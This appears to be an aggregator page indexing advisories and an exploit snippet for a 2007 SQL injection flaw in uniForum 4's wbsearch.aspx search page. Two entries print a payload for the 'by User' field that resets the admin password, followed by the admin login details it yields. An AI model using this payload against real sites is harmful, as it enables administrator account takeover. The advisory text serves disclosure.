EUVD-2007-0228

Malware in sbrugna...

uniForum <= 4 - (wbsearch.aspx) Remote SQL Injection Vulnerability

No description provided by source. Title : uniForum = v4 wbsearch.aspx Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : ... Vendor : http://uniforum.biz/ $$ : $99 SQL--------------------------------------------------------- http://target/path//wbsearch.aspx POST Method SQL...

uniforum4-sql.txt

Title : uniForum wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'-- Login Admin:http://www.xxx.com/path/wbadmlog.aspx Username: Administrator Password: 000245 /SQL """"""""""""""""""""" ajann,Turkey ... Im not Hacker!...

uniForum &lt;= v4 &#40;wbsearch.aspx&#41; Remote SQL Injection Vulnerability

Title : uniForum = v4 wbsearch.aspx Remote SQL Injection Vulnerability Author : ajann Contact : : S.Page : ... Vendor : http://uniforum.biz/ $$ : $99 SQL--------------------------------------------------------- http://target/path//wbsearch.aspx POST Method SQL Example: //Fin the -wbsearch.aspx...

Sql injection

SQL injection vulnerability in wbsearch.aspx in uniForum 4 and earlier allows remote attackers to execute arbitrary SQL commands via the "by User" field aka the TXbyuser parameter...

CVE-2007-0226

SQL injection vulnerability in wbsearch.aspx in uniForum 4 and earlier allows remote attackers to execute arbitrary SQL commands via the "by User" field aka the TXbyuser parameter...

uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

Exploit for unknown platform in category web applications ================================================================= uniForum wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'-- Login Admin:http://www.xxx.com/path/wbadmlog.aspx Username: Administrator...